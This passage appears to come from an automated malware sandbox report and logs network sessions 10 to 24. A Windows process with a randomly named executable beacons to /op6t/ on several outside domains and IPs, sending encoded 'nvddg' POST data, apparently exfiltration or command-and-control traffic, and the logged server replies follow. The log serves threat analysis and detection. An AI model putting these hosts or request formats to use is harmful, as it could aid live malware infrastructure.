                                                                        10 | 192.168.11.30 | 49806 | 34.174.122.2 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:32:28.113116980 CEST | 800 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=MFggT74RcgGFB6dPyMGBontMASMctAD+iNiNWrOOpujcm7cRFcoktZimMBnLibLG8Gvbrc602nXUl7s7TpwFrZqWiq4acSQIUUxTZAinpmdBtqGsNtSb9T7skzuWhCFUap0Yig3Zvdxc4wuC1U+7w0k9KzVr1i6T1eZYH4ZGkOTVKpuiHg9Eu8KY2Vp3w8wHpEAmMpjaFNHMPZTYKhsm5Jo=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.11.30 | 49807 | 34.174.122.2 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:32:30.856517076 CEST | 1717 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=MFggT74RcgGFB6dPyMGBontMASMctAD+iNiNWrOOpurcmNIRXLcksZimPBnWibLX8Fffrc2k2kvUmZk7SYwFkZqWqK4ZTyQdUVBXZAynpmdBtsqsEf6b/T7vnzuKqiFoathvigDjsp9c4ReCzmW7zUk/LzVj1inJ1a4pH4FskMzVb+PVcB9F5eO6z08A3PkLhDZbMKD7Guv6K+v6QCERktf+64Uxo4Xom1jTd4EmaiTaNGDaYfscg8L0QzioX8R7TgQk0VJm5UNPUbqruyuNA1cdYpzfLCdrQ8S3ijF0V1qmaTSpuKnLDHEUHA4G1qVDgZU8t/98NFMrOqK7nA3yflSHNl6/vLIteJPPkc9im1aBJH80mtyzRICtxK7Dt/u1w8+2TtKvZ6+WPOw6HWmfVXEZZc9o1PI8WXr0NBMqANv5woCjlC/UUd0dUe3+D6hmHiVJct+5ryk4QW4kuwimSj2FPbphcSeuCw91SDEO9q/VIXexP9zB+PylFhsK4mfWAOEwpXEIbJ3A0yQvnOy8N/jMnN08ziILLaRliCVvJBPLLtOzwyMUpValMiUvtIeQMudhrr+hxCkF7gNK/TwfMYRcLz8aSKoWgJVfLTPdXpfp0LL1IbKhAUH93vIG4EKOGah1Ud2sYxfNonJAdm039GZUEZ4XLgIiyPXH2eealC6aXERvJgx1Oxatih89ovf148KxGZvkuIjUPZRtj031fCNzm6A0MftnymtZdc+gGVOlW8ElpyzLfFLIhYqaS8ugDFNOrEbI+mtLZOi/rTls0CcseDXamQfLHrDW1gqwWdLJcupkR1eRm6zbD2K6afphE6u8mw43RGeRtVr8QPmaXowq7mOp5Kysr3i9GPjaGDr5JqjU2rRvPxlX8eVF1XSmlUtEoLakjFCvm0CMmTR2ufaIOkMjlN3my1MbfQtTQj0aZtud4mDyPHXZ7a/EoW87X/yWK+IXuzxomxBDsRGuzJTqtTjF6gUNRj0hJsE7tso8eb [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.11.30 | 49808 | 34.174.122.2 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:32:33.605540037 CEST | 493 | OUT | GET /op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.facesofhoustontx.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.11.30 | 49809 | 47.243.134.243 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:32:47.971615076 CEST | 753 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3xU7fMvZmBpg08FQ6g+NYmhb/t7Py9rYJ/HhEjyp+B5gogzfgkZXG2by6hrTVe/UbiHSobOldenfimcGg9o4gjRFrYYjKvgtXFSdbGb7x57dZuDmPYdsr5nL2yHCOXRt2DgnNNzdWd6oAERql5K0H0YC1Diejyto+q1oR9l7mIoC2qf4+YdQMw==
                                                                        May 22, 2024 17:32:48.427275896 CEST | 354 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:32:48 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.11.30 | 49810 | 47.243.134.243 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:32:50.831928015 CEST | 773 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3Sc7dtvZhhpj7cFQ1A+JYmdb/oCUxPPYJbPhKCyp/B5gjAyVkkZcG2HQ6j/TVerUbnDSoMamfOnd2WcEudo4gjRFrYNOKuItX1OdJk/87Z7ceuDmLYdor5nl2zalOVpt2BonOZneYd6qEEQpmrjNP14f0zy4sApD2dEyM+R51oUvqryQ8acLR8SDWy7ghP+vBL3lljJ2Bvo=
                                                                        May 22, 2024 17:32:51.156186104 CEST | 354 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:32:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.11.30 | 49811 | 47.243.134.243 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:32:53.827625990 CEST | 1690 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=[TRUNCATED]
                                                                        May 22, 2024 17:32:54.304582119 CEST | 354 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:32:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.11.30 | 49812 | 47.243.134.243 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:32:56.756414890 CEST | 484 | OUT | GET /op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.cngdesk.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:32:57.196403027 CEST | 490 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:32:57 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4=
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.11.30 | 49813 | 203.161.49.193 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:03.263103962 CEST | 756 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWNo8JlaaNBZd/BU9ZkuVVCFq8i8M7IKfLYTDnjShYy2ws03ydvswFJhDXEhAU+R5bK+Y6cqqFoNB+imzuee3+LDhK3RZZ//AsxjC1sKkfvUq68t9yn5HPQyOqBE3Mvllq9rL0U+IlF4G5W9og5nc9R2YcFcaxA8p4zZow/2s66/E6HvreqmjEcA==
                                                                        May 22, 2024 17:33:03.482141018 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:03 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        18 | 192.168.11.30 | 49814 | 203.161.49.193 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:05.996160030 CEST | 776 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWMJsJg9ONIZd4dk9ZqOVRCFm8i9JmI57LY2/niThYhGwsgnyc3Mw0JhH1Eh8U+RFbK786cZCGodB8qGzoQ+3+LDhK3Vxz//YsxTy1suIAl0qlq99yj5HLQyOIBHypvghq9q70UMwmO4H8Zdpz3XZqJE5xU+PuBMoDyOZqi1Y4pf4XbuG2okifBA9Qc7DwxxTJrwYI/WjoRkw=
                                                                        May 22, 2024 17:33:06.214934111 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:06 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        19 | 192.168.11.30 | 49815 | 203.161.49.193 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:08.728420973 CEST | 1693 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:08.948518991 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:08 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        20 | 192.168.11.30 | 49816 | 203.161.49.193 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:11.463862896 CEST | 485 | OUT | GET /op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.shortfox.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:11.690143108 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:11 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        21 | 192.168.11.30 | 49817 | 37.140.192.90 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:17.446010113 CEST | 756 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tNwWPAv0cUZBOP4IpWfR9wh6dddNPDLZNnOj7SfcnKyxQJbwtbf+bECQpFEyKsGAes4oVnafNBngSlO+BvIXGngvAGloPv/WwUHYveSTFJt/K5qykoZ12V+s4Xa+YO0Qoze0N7B4IobHRNtBYsAuGek2ZgowgYwWNkVDw0Ic/ieU/X8AG6LNmQ==
                                                                        May 22, 2024 17:33:17.817557096 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:17 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        22 | 192.168.11.30 | 49818 | 37.140.192.90 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:20.315660954 CEST | 776 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tu4WImn0NEZAS/4Ii2fV9wt6dcYIPxvZMFWjqjfcpqyxEZbxwrfpbEGYpBEyKs6AeuwoVQuYXxniUlO8ffIXGngvAGhOPvXWwkXYt/SSbZt+L5qyzYZx2V/L4WGUYNAQo2i0Mp55fYaMVNsNXpleA9kpXCAp+5lzBTkZt38esCi5jWRoE4KW7Qr5YW+vHOoW4r3DqWPeuaY=
                                                                        May 22, 2024 17:33:20.686563969 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:20 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Ascii: *ok (wL]|~r*q B ae"6GZ(/Uh,I CD!*I>k1^8P9$<Q(n)9'AyMETh~^4@a)*|i3#GCTE~,het# uzx.PF1u@x C#6q
                                                                        May 22, 2024 17:33:20.687896967 CEST1289INData Raw: e3 65 b1 56 48 df 6d be 4a 9e 70 89 10 2e 8e 76 52 3e 0a 3f 73 94 cb e5 6c a1 d4 c9 cc 94 ab 75 94 8f 2a bb 7c 07 e5 65 5d 3e 6a 4c f9 b3 f7 79 8d b0 97 50 be 5b d8 3f 87 3e 7f 66 69 ff 72 fa bc a8 f7 23 f5 7c c3 a8 9b 55 11 4c 51 0c d7 0d 05 b0
                                                                        Data Ascii: eVHmJp.vR>?slu*|e]>jLyP[?>fir#|ULQ>2^^K;4w$`!~tGD_"dkj(!iDNf^&0"26+*T[yfXETI.{5t)Q|mcWNB4mCeie
                                                                        May 22, 2024 17:33:20.688009024 CEST1289INData Raw: 03 e8 67 24 d7 45 b1 96 13 a9 d6 f6 15 ea 5c a7 e7 ed 9d 52 91 d6 58 25 ba 4c a0 9f 4e 9e 43 5b 4e 54 04 85 1c d9 af 10 e8 51 1b 81 1e 1e 5f a0 e5 31 95 68 70 da 40 ba 88 b8 40 73 89 85 33 1a 11 65 0e 77 43 55 1e 6b f2 94 22 df 53 d2 43 25 9e 08
                                                                        Data Ascii: g$E\RX%LNC[NTQ_1hp@@s3ewCUk"SC%zkrsMPO*%!</'RG ` ox>Es[fq#8%z}gE{3)cy)._CX*|J$#C5,a(.i=Z^Z:u0H
                                                                        May 22, 2024 17:33:21.032489061 CEST1289INData Raw: 77 cb 05 38 9c 32 84 22 90 9c 08 e7 81 a4 65 38 04 52 da 96 bc 14 e7 e1 64 c4 38 04 94 93 bf 98 aa 9c 24 17 e9 4a 8b 72 08 2b 27 3b 21 ac 82 30 e7 61 65 a5 39 84 25 97 52 98 17 c3 3c a8 8c 14 46 53 f4 a8 0c 52 51 a4 f3 b0 72 32 1d 42 1b 96 f2 2b
                                                                        Data Ascii: w82"e8Rd8$Jr+';!0ae9%R<FSRQr2B++yH)KvLZ;)#zEA;r'&srjR].KtBF(H2JAP"LP"7C*frV(lFJ`i5 -ZfAdd 8


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        23 | 192.168.11.30 | 49819 | 37.140.192.90 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:33:23.189503908 CEST | 1693 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:23.567965984 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:23 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        24 | 192.168.11.30 | 49820 | 37.140.192.90 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
